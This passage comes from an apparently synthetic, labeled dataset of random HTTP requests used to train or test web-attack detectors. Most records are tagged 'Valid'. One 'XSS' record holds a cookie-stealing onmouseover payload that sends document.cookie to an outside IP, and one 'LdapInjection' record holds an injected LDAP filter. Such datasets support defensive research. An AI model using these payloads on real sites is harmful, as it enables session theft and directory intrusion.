User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 0.4; es-fi; rv:3.6.7) Gecko/08493081
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 229x467
Via: 1.8 246.164.138.81
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 819 33.34.116.163 "Eun7wngOa" 
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47896
Start - Id: 47873
class: XSS
GET /lmtoieztatm/jf@.bin?4Xap4C8QzI6K=ssj&boScocteetant=lcTmr&evgQeo=iT4LKjqhv&edvaU=8310&tlcea6lfttryh5u=%3Cdiv++onmouseover+++%3D%22++++%5Bwindow.open%28%27http%3A%2F%2F9.12.195.215%2Fge.asmx%27%2Bdocument.cookie%29%3B%5D%22+%3E&jsCso=iMiWB&e6ecbs=r2uf4qz1tH HTTP/1.1
Host: 173.152.204.115:7659
Connection: close
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.1, macintosh;q=0.7, isiri-3342, x-mac-arabic, windows-1252
Accept-Encoding: *;q=0.7
Accept-Language: eeeo-tmTeosk;q=0.5, baenbt-m7wokep, tnr0sTrR-alyteewI;q=0.7, aoneC2er-iDb2
Cache-Control: max-age=344
Client-ip: 239.162.199.206
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="7"
Date: Fri, 09 Jun 06 23:18:56 GMT
ETag: "q3-IpkwztXwbCovTL"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Tue, 03 Mar 09 12:06:34 CET
If-Unmodified-Since: Mon, 01 Mar 04 03:19:39 CET
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 1
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: NTLM c2tvaGFhbnRqaHIyclR0bjJpZG53SGVscnNocjd5bmlydXNpblRyaXM2
Range: 064-,-6198,422476-
Referer: http://imidre.it/emOnkut/ueehr/cOlsldAn/nIp3a.cfm
TE: trailers,trailers
Trailer: Accept
User-Agent: ri2OghoO2t4iter2ltu
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: FTP/3.7 4.211.131.50, HTTP/4.4 www.4iicntw.html, 5.5 96.80.31.215
Transfer-Encoding: identity
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47873
Start - Id: 19671
class: Valid
GET /-%uZ/jdUCT4rtcdouza/zOqbzi/_x0GFu/mv5FXEJx_vmgOeU/cTmedst61z/Ent7IiusSth/2O3oKXfju-puBr/lcNZMzrsoTT_HM4g32/aslfwiIpzMLsgXoTOPH/eH/jrei.htm?sedhcrz29u=es&ad=thrrbrsgem&idr3aoogNo=ir54&shduiLfhsu=l&r2nhsln=enc3F%26deletelo%2B7tn&kuLhwindow.open7IjPnp=273374737&_qBQP=euhc&Ttt7=092371&wgeLushdnsltme=4&hoptWECGhr=s HTTP/1.0
Host: www.s714cpao.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.1, gzip;q=0.2, compress;q=0.0
Accept-Language: lfieit0-Wtc, issxf5oe-2oye, t-Urp, uettAi6k-bdirs;q=0.5
Cache-Control: min-fresh=8
Client-ip: 73.92.189.99
Cookie: aoos=504;pwczlizapg=616;rlelhRlelto=pi;Pr=01509;af=hYetu;vobjectb2xGmG=8
Cookie2: $Version="73"
Date: Mon, 21 Sep 09 04:42:13 CET
ETag: "xhLkdR7Iv9S.2p3FBhDQ"
Expect: 100-continue
From: 5ii3SCR@emldmes.gov
If-Modified-Since: Thu, 13 Jan 05 12:42:09 GMT
If-Unmodified-Since: Tue, 01 Mar 05 10:02:11 UTC
If-Match: "hRK034LO6gdaRPtJ53k"
If-None-Match: *
If-Range: Mon, 12 Dec 05 09:54:30 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: Tu=ot
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: NTLM eWhjdE5wbXhhYTc1WnRuck9pN3M3aWhpMGF0cmZNNEVuZVJIdG5Nc2UydA==
Range: -616446,-952232,-327
Referer: http://www.pfngttoh.de/m1afe/Nits4Te/omlgf/htbae.html
TE: trailers,trailers
Trailer: Via
User-Agent: feeennl1/9.0.8.5.9
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 106x833
Via: HTTP/1.2 www.gsniInl.gif:19, 9.2 www.iesxB7id.jpeg
Transfer-Encoding: deflate
Upgrade: oalaa/7.0, rhnhe/1.6, nkog/3.3
Warning: 720 202.193.20.146 "vzausimaegtuyuinei" "Mon, 07 Jul 08 14:32:11 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19671
Start - Id: 38975
class: LdapInjection
GET /na/cTXT_M6.jsp?iegattesooexrn=sne1&buGYI4ix=+mllocation&g2rqbplvW=76&0btmgdinanfr=%29+%28%7C%28displayName%3Dhad*%29++++%28name++++%3D++had*+%29%28++mail%3Dhad*++%29&qes5oE=338878&qo1etauh=80&asouth=0520086&UmupdatepsMI5n0=teheaoittv&uyradoim4jorp=+%5BnS&TnboIsnetiuu=g%25bidiv%24gdroppi%5DrwinnthEi&aRsy2=%3C%3AciikrRcbgsoundro+&tqo2iea=nmr HTTP/1.1
Host: www.oseaaesdhl.ch:80
Connection: keep-alive
Accept: image/png;q=0.8, application/postscript, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=9017
Client-ip: 39.110.44.223
Cookie: yrTKYD=rgdsjmddTcephh4ed5
Date: Sat, 26 Aug 06 05:02:12 CET
If-Modified-Since: Thu, 03 Mar 05 06:30:20 UTC
If-Unmodified-Since: Wed, 11 Jul 07 16:50:12 UTC
If-Match: *
If-None-Match: "Ezqb9hGyhg4TGD-ns"
If-Range: "kPL8_tZ-AvK_FZsOv"
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic ZWplYTppdHJTdE0=
Range: 4-376,4029-
Referer: http://www.behim.uk/gieaks/eeitnfj2/zoo66aTy/ren8/zyeotear.bin
Trailer: Max-Forwards
User-Agent: o3OXYx http://www.ie3jdT.gov
UA-Pixels: 9003x7790
Via: dis/0.0 195.217.62.241
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 70747450
----: ---------------------

null

End - Id: 38975
Start - Id: 7090
class: Valid
POST /7seA/altenriehk7smctaiLte.shtml? HTTP/1.1
Content-Length: 116
Content-Language: 6i2hkhn
Content-Encoding: identity
Content-Location: http://www.tuuE.cz/spweemri.gz
Content-MD5: aWZsbmlhbnRhdGx0Y2FZbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 24:47:38 CET
Last-Modified: Thu, 20 Apr 06 12:16:50 CET
Host: www.diaqot.ch
Connection: close
Accept: text/*, audio/*, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: aScpsIV-exnlinaa, eeudttt-J3noge;q=0.7, ndoeeng-xseaaSn;q=0.9, GyE9tnqV-pe;q=0.4
Cache-Control: max-stale
Client-ip: 252.246.145.208
Cookie: Aei=aDHgROUb;enhoX=105087;ee6ebouJE5asO=3vX;Wd=heiseodB;owotewadtinL=yh$b een/h9]oii)
Cookie2: $Version="672"
Date: Mon, 11 Jun 07 23:20:57 CET
ETag: W/"S7fAXx-KnQ-6d7qdiMse"
Expect: 100-continue
From: sneehouu@vual.net
If-Modified-Since: Thu, 26 Mar 09 08:17:38 UTC
If-Unmodified-Since: Fri, 10 Nov 06 20:47:38 CET
If-Match: "sdXpyX7UR6FNzVWsMB"
If-None-Match: "LAM9pqFgajbTbRRea6z1"
If-Range: Wed, 19 Dec 07 22:07:21 GMT
Max-Forwards: 8586
MIME-Version: 0.4
Pragma: Aext='6l0do'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="M7zieY"
Range: 831-,5-,9058-
Referer: /Ersh/stcgyss/hva9egta/TsowK/kdaYen.php
TE: trailers,chunked,deflate
Trailer: Accept-Language
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 4.5; ms-lg; rv:6.4.5) Gecko/07396318
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6819x838
Via: FTP/1.0 116.154.26.22, HTTP/1.1 www.tptr.css
Transfer-Encoding: gzip
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 333 208.3.135.177 "aIgredsBeerjteiMEnc" 
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i9oorDnz=tn7DO&6feNyogcrt=620&tenetac=nn3eotnp1tgne&diwrIghrb=ribdYHrxOZda&ooi1le=e&tetictl=lao&location0i_F3ZX-Fw=0

End - Id: 7090
Start - Id: 5204
class: Valid
PUT /evt2eMeIqcqI9-TYELg.php? HTTP/1.0
Content-Length: 258
Content-Language: b7,madepi
Content-Encoding: deflate
Content-Location: /fwtnsb/mA2orio/ttgm8e/otwsy9yt.txt
Content-MD5: c0h0QWVzNXRhdE1zZUh0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Oct 07 01:31:58 CET
Last-Modified: Mon, 12 May 08 05:49:11 GMT
Host: www.cnuls1a.it
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: msuhh7c-8vorW;q=0.6, sug-ukrtWowr;q=0.8
Cache-Control: no-cache
Client-ip: 65.23.172.54
Cookie: fgl=rr~ji;mhbvesE=winoedchild
Cookie2: $Version="7"
Date: Thu, 27 Mar 08 10:24:46 UTC
ETag: W/"XIDp6nIWE@M@JC_Zu9Mo"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Wed, 09 May 07 13:29:44 GMT
If-Unmodified-Since: Wed, 15 Apr 09 11:35:37 GMT
If-Match: "xneQDEueY9-QVQnHNsqB"
If-None-Match: "_Bo3Io1aeZYAn_.K"
If-Range: *
Max-Forwards: 5234
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM cnptb29HaWVua0huZUF5b3luenVlYWlUcGFoaWVpbkliZXJFbHVhb2t0YTlX
Authorization: Basic ZWV0VG50dDp4b2hkZWllNg==
Range: 842322-
Referer: /lsl6og3l/anazA67/ao7ksa.bin
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ghio5mt/2.7.5
UA-CPU: MIPS
UA-Disp: 696,288,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 523x221
Via: 3.0 www.abyBniDr.jpg
Transfer-Encoding: identity
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 746 188.123.7.9 "itaeperj7ydeteaei1" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

6ciyirerx=6704&ECmHeehEsr=2906&getg5UsOf=70666833&YZPbB=onnn&tsAhdyAefetrtrd=8~aerjh%f iexecsoopen</a'h&BywchildincludeQTk=rTed6i9iuorL2p&rnd=Osz&jibgpi=tt eeti&pguiect=bvrduFNEc-rK&ootnnietslgt=apaua&9zArrwcn=scriptu&aKsZe=heme&5e7yojeps=es8etcrcp

End - Id: 5204
Start - Id: 14202
class: Valid
GET /jv.gGIdAN0yj.Vfjd/otgetoreo/i-sGeD9wrqF/s4Spl/i0e0scheee2Elnay/aA8N6laMm61/mren1nzjnyS/eQvg/erlneNpoaoey2utvaqa9/4so5he/5olgewfobVhrehiidt0.js?erd=si&Yeoe0ebty21s=rzid&oc=43204&5ser=1989730197&hrteoran=pTlji5ie3oHiai&OdEee7eHhNo=eego&hNg=%40e8&xu9e0zg=+a%28h&taioTpQs=%3Cie+%28&sthnceegnlu=ruh+&nW=w&aednrj9t=ivfPUJ53y HTTP/1.0
Host: 145.232.148.182
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 163.197.40.45
Cookie: 0xd=itoptalo opwrhh;fsso=7440;2olsurWorXkoaqs=2659211
Cookie2: $Version="456"
Date: Fri, 17 Feb 06 08:12:18 GMT
ETag: W/"4NEV@TBQoKP07UdrbFD"
Expect: tsTeh
From: hoeiim@ceoiedong.st
If-Modified-Since: Sun, 11 Jan 04 08:52:38 UTC
If-Unmodified-Since: Sun, 15 Aug 04 04:49:28 GMT
If-Match: "w-Z5ryjiszClvr5B81@"
If-None-Match: *
If-Range: "K3fy11Dyqn0KG_XQ"
Max-Forwards: 7
MIME-Version: 0.5
Pragma: cs3dyob6=tydtrzr
Proxy-Authorization: dndh ietm=rse69h3
Authorization: Ps0g ea9yrs=lnned
Range: 835-87
Referer: /ccorlsrg/snvdseq.cgi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 7.5; es-2c; rv:2.8.4) Gecko/55848074
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 962x171
Via: 2.3 32.251.222.190
Transfer-Encoding: deflate
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 631 173.31.157.130 "elNew" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 8726872524288200
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14202
Start - Id: 32466
class: Valid
GET /hPbrTRRa@Fmo/cok44fT801kRddYzX.css?IVt_o=samhcp+gR HTTP/1.1
Host: 182.145.211.76
Connection: ildie
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: sEr5rdMe-wio;q=0.8, rdrgit4-a
Cache-Control: min-fresh=8435
Client-ip: 93.135.40.113
Cookie: SsYi=rn;tonsadetf=es2;6hlthnl=ixno;a2EoFjsZOs=rDCHzQsFI_w;Shlto=58000;hertrrcawtofIu=sIT
Cookie2: $Version="9"
Date: Mon, 12 Jun 06 11:49:00 UTC
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: 100-continue
From: ontatyS@Dceip.ch
If-Modified-Since: Tue, 16 Jan 07 18:28:46 UTC
If-Unmodified-Since: Wed, 23 Nov 05 22:17:46 UTC
If-Match: *
If-None-Match: "B-QZbiQ-l5eCZ9R6nl"
If-Range: *
Max-Forwards: 01
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: 3essmH teen=haeni4
Authorization: NTLM YWFnd2Fsd2d0ZXhOdGVycm90UzhlYWF0dFB1cDJlbmFndHVXZGE=
Range: -5092,565429-
Referer: /ryse/heh8En/ahweoew/ii9eo/nidoo.php
TE: chunked;q=0.6,deflate
Trailer: Expect
User-Agent: Fsi1l/4.1
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x3717
Via: HTTP/0.8 www.ilaayet.html, FTP/1.9 www.cnxsrlt.html
Transfer-Encoding: gzip
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 562 108.253.133.99 "oeOnE" "Mon, 26 Oct 09 02:37:57 GMT"
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 31593732
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32466
Start - Id: 11258
class: Valid
GET /IJ_N9BhzpassthruZpgvi/7BphpwnJdGstdin/nBzDWKPnd/scLr0clOqN/vaKB40iACNL1@/hV3u@@u4w/oIi5oeea.nsf?6ef=lWFiph%40fYt&81dIaergzcwoa=beU6IO67-&TF.allcOf_RY=5008259&almobEzoec=66722&stlmne53wuoyaoa=uH%2Ba2rge+8usreOe&vbscript2lOperl@L=H0Eizb%24z%28%3FRo&J10P-W6pLGnetcaty=1794795&ouat5tnahtnLhnn=yevart5outh&UhTAQOaaccess_logLQQG=tsamnti&gpsLyhethd=em9-eIVggV0&dgx=54817311&ee2ed5x=rass2hid5u60d&Npeoni8o3wayetM=eTc%28k&oht3ecef2=srhome HTTP/1.0
Host: 69.195.67.246
Connection: close
Accept: text/*;q=0.6
Accept-Charset: windows-1250, iso-8859-15, iso-8859-8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 49.40.111.24
Cookie: M5cZgroup byt9h.fE=>a;YeZcdm4I@E=saft;fersrg=aytdeighePr;d4RC=49wa4aoHqM8o;HNqvqZ_AqYEphp=na;rtetia2e=sTxz_4nVp_
Cookie2: $Version="475"
Date: Thu, 11 Aug 05 20:22:02 GMT
ETag: "r6cFlT69xgKl84H"
Expect: e7exuse9
From: aarli@mLmeltu.be
If-Modified-Since: Sat, 12 Dec 09 14:29:15 CET
If-Unmodified-Since: Wed, 02 Jan 08 14:03:31 GMT
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: *
If-Range: Tue, 09 Dec 08 11:04:27 UTC
Max-Forwards: 474
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: Digest uri=http://eYaez.uk/sgdslzo4/iedthrvG/xusueg/l3ni.cgi
Range: 394051-208299
Referer: http://2tihscth.ch/dvvtsu.php4
TE: deflate,gzip,chunked
Trailer: Pragma
User-Agent: rhec/6.9.1.5
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 234x2210
Via: 7.6 142.84.149.157, 4.4 243.98.93.95
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 818941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11258
Start - Id: 17453
class: Valid
GET /g9nyMDPA9dj__/TBOVZyO/oneoel/tU0q2zosHeEWY_laUvC1/9MbE4documentvgroup byseX3i2/a2apne7asrSgattu3rbv.tiff?toeeihrh=miemidwlnec&tg9ttsdNf8res=malI6n8eoecl&tts=6756906138&LNQYmvR0P=thneer+tephp%25Ptcirc&wTqAqMtmp=r3taOzniRcd&ei=78212&yb2hu50psee=at%26e&irWtnaetlrofOEv=w3ov&fA=0485852&fTysoe7pBr=p3psI6oTcxa&bLsi52i3dwogc=3&goi=1451&lw=1956&Jh1r=wah&atgy=null4imhtpassauee HTTP/1.1
Host: www.oneehsvt.be:87
Connection: close
Accept: video/*, text/*, text/*;q=0.1
Accept-Charset: x-mac-cyrillic;q=0.2, x-mac-japanese, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16
Client-ip: 141.4.227.36
Cookie: putl8di1euaAhio=930835;adnlplovi=oNererx0bya;wceateo=Oa(nalitnar%ia
Cookie2: $Version="744"
Date: Thu, 04 Mar 04 10:50:48 UTC
ETag: W/"jyVMGH5q0Z2w9gdZWF"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: eohgx@txte4.gov
If-Modified-Since: Wed, 04 Apr 07 17:47:16 UTC
If-Unmodified-Since: Thu, 07 Dec 06 01:27:39 CET
If-Match: "VtlgBm5F7Wb-5R.@@xk"
If-None-Match: "t7lMfbCtxG07YP26ySBl"
If-Range: *
Max-Forwards: 583
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: Basic ZmVpOWU6bE5zaDQzaWE=
Range: 676-
Referer: /apiRsr.jsp
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/3.5 (Machintosh; U; Mac OS X 1.0; li-tu; rv:5.9.8) Gecko/07272445
UA-CPU: MIPS
UA-Disp: 779,0995,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 211x6880
Via: HTTP/7.9 www.athdeec.gif
Transfer-Encoding: identity
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17453
Start - Id: 24300
class: Valid
GET /hUB-/ero1.php?14goNnNtaohdsk=ve&olTientomt=51044&uaety=a%26snmeg%40sock_streamI%29u8&Hhgm=fe0p&0nxaeeoTahorsn9=%29g&ah=hmwten6tien%3A&nSWEWZza_Wn=901&ne=1gtslnaztc%25&nttyoieerc4=zny%3Ahj+asesecsock_streami%40o6&ohHinsemptsoeI=oo6shdsr9dssht HTTP/1.1
Host: 20.43.18.134
Connection: close
Accept: text/html
Accept-Charset: hz-gb-2312, euc-tw;q=0.3
Accept-Encoding: compress;q=0.4, gzip, deflate, compress, gzip
Accept-Language: lpu0mex-hunLtdaR, taRhetve-ussotmr;q=0.7, lgthO-eeeloiyO, blnqomp-Rcm8ut;q=0.6, dan6i-OHii;q=0.5
Cache-Control: no-cache
Client-ip: 123.201.157.28
Cookie: aalsTntva=soiaS;eemzamUeaDstgdI=jt7hneccabaform;leR=uyAJSEenF;42efxssu=9aHai6 oxsgoe6e;suhwP3xnAilKOn=Pzafs;evigein=a2V5pyYLW
Cookie2: $Version="8"
Date: Wed, 04 Feb 04 09:16:11 UTC
ETag: W/"n0BFtP27Zs7wlaOi9I"
Expect: totv2sh
From: sanuSn@htec.st
If-Modified-Since: Tue, 06 Jan 09 22:29:22 UTC
If-Unmodified-Since: Sat, 31 Dec 05 19:58:45 GMT
If-Match: "eCf1r0sNNbAPG-2RH.kW"
If-None-Match: *
If-Range: "6Iwb-6TApqq5lDQ8"
Max-Forwards: 5
MIME-Version: 6.0
Pragma: uh=nxihGd
Proxy-Authorization: uhfn utsaMStl=trta
Authorization: mabR seao=oeest
Range: -375
Referer: http://c9bdL4To.net/pOae/bo8b/cteti/riatrs.zip
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (X11; U; Solaris 2.0; eo-jo; rv:4.2.5) Gecko/42076336
UA-CPU: 68000
UA-Disp: 298,2498,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 982x566
Via: sdrab/7.5 61.104.92.64, 5.6 www.ilos0kqf.gif
Transfer-Encoding: patpte; knojetis=eextsT
Upgrade: Orsqn/0.1, Hnohe/1.8
Warning: 386 www.1lin.png "g9hderw" 
X-Forwarded-For: 76.236.144.82
X-Serial-Number: 26590615191499
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24300
Start - Id: 11772
class: Valid
GET /Ac.cfm?emsyNliaAd=ahuhjsl&xthxy=88601&fntTu3bl=mmsci&de8pu95isiuqpse=eehho5&hwt=1&mvhdsnunf=trA%5DueeztrtD&osea2Pp9s70=xt&otbgimyL=uKUF68tHfs8 HTTP/1.0
Host: www.Wp9f.cz
Connection: Ginse26a
Accept: */*;q=0.6
Accept-Charset: euc-jp, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 51.103.184.132
Cookie: tai5smusomR=;\exterm
Cookie2: $Version="7"
Date: Wed, 14 Oct 09 20:30:49 GMT
ETag: "_Xa@6Bpb60Qnyc8k"
Expect: dxtgy=tewr;dph9ulHh
From: KeaS@rpHi9.it
If-Modified-Since: Wed, 28 May 08 19:22:49 CET
If-Unmodified-Since: Wed, 18 Feb 09 20:55:43 GMT
If-Match: "NSciXNgENoH4Pefnbk_m"
If-None-Match: *
If-Range: Mon, 11 Sep 06 21:29:36 CET
Max-Forwards: 554
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGRMazhodGRqb2Fka2FBcnJzMGFyYW5yc2hIbjVkZXR1aXB2Y3ZlcXQ=
Authorization: NTLM YWxsc2VBYmtybG9uOGxyaW9lcTJnZXRwZWVlZWVkZXR2dGk=
Range: 9-947069
Referer: /fn0t/odcy0t0r.swf
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.1 (X11; U; Open BSD i386 3.3; Tn-cr; rv:0.4.2) Gecko/70190755
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 883x0271
Via: HTTP/6.3 www.h4oTvow.html, llGon/6.8 230.251.2.138
Transfer-Encoding: deflate
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 864 www.odc5ns.htm "tlwt73eSeidle" "Sat, 17 Jan 04 09:21:50 GMT"
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 74383585408029434744
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11772
Start - Id: 887
class: Valid
GET /b0JXOH9QOQyhM/sATPQO/sqRW.8Rk4fqu8S9OFdWA/h@kq41mqm8Go672HB/iwsgehdr6rdrwMeE4rxO/ohga/etz3ytyahrpr0xc79/sutlecsHeh6uEa/2p/n9eirmGs5ttheSsgsili.tiff?ZQftphttpbUFQb=Tql+eiPezmeett&tfnoWUvT4zsamI=rygn&wvczxY=3Mi&ernonbjEia=no%3Clir&nosee2SsgntPxi=pexecf%3B&eSatrs8tneUho=ayi&rr8eanEyIs2do=c8TM&UpJbudenZmkY=shij&eeloeeeshot=%24yapsus%3EeegOke&rNCPchildaifGXXpasswd=h3obm6lonpldyy&tyamyiidirs=nY8j0&U4eEa=Cehkt+a&rrwstao=tnABl++deleteioSbinlyO&phKgEIl=s+acceptl HTTP/1.0
Host: www.seTjel.ch
Connection: keep-alive
Accept: audio/x-wav, image/png;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 233.93.204.250
Cookie: WCqEMofYh=h;OziTgsESXv=425032028;ymAeeZ0=623;dKQ@=sehefisGhttps&nsrth;l0icelhh=2do/r
Cookie2: $Version="2"
Date: Sat, 27 Mar 10 11:35:43 UTC
ETag: "XSjeLmo19ESb18co3"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Mon, 24 May 04 04:00:55 CET
If-Unmodified-Since: Thu, 20 Aug 09 18:44:49 UTC
If-Match: "hwfpfqqkr_pqYaa"
If-None-Match: "NDIVxooGh9RTP8Ix-"
If-Range: Thu, 04 Sep 08 22:29:49 CET
Max-Forwards: 505
MIME-Version: 0.0
Pragma: tgsso='osrfodai'
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: pjriym olPtt=agdgali
Range: 03-,31-18005,845834-77348
Referer: http://www.eisioii.org/zecntclp/t79ae3Ed/to8pxln/k81hepn/cur13.gz
TE: trailers,gzip,chunked
Trailer: Via
User-Agent: oucrt/4.9.3.4.2
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 848x029
Via: HTTP/8.4 www.iqsmnd.html, 6l0rm/0.8 120.89.180.152, FTP/4.9 92.205.113.225
Transfer-Encoding: ee9is
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 887
Start - Id: 19954
class: Valid
GET /rtNmldnHlf8zgShDk4x/fr@dog/9mrdtnn3kHytcsurwi/cqKewNrGXupdateexece7aF/ou7ozy/Zlog@pNIOQginP.php?KLorfT=ppassthrustmpf&cwktDBlY=msanDppa4cea1c&U_evalqxlY1=hrgo&9NKwspJcopy=ua5&zralt=2383&ued5Errlsxsnin=llsdEwoop1tAqfoef&oofsv8rsvuOehO=ouZhwV5s9&ol=4490501&gtmpeoweh=dm&DoroptdctdvAe=anhhHC8o%40&O9rebrcdo4ta=a5%3An&s1bxy=onisA&8c=4374890&isan=oTqtuhsdia9TsHatco HTTP/1.1
Host: www.b0dplaohA.st:80
Connection: tfri
Accept: image/*, text/plain;q=0.7
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 160.212.207.190
Cookie: ot=e;4snri0Hodrgas=7;ttaT=wOd;edyl4ohsa=en4cR O execRnbfy;tylal5wtyrsott=asUEKxY;m159u0=o:
Cookie2: $Version="80"
Date: Fri, 19 Jan 07 14:05:09 CET
ETag: W/"MrWx0rpeX4hOKRcv"
Expect: 100-continue
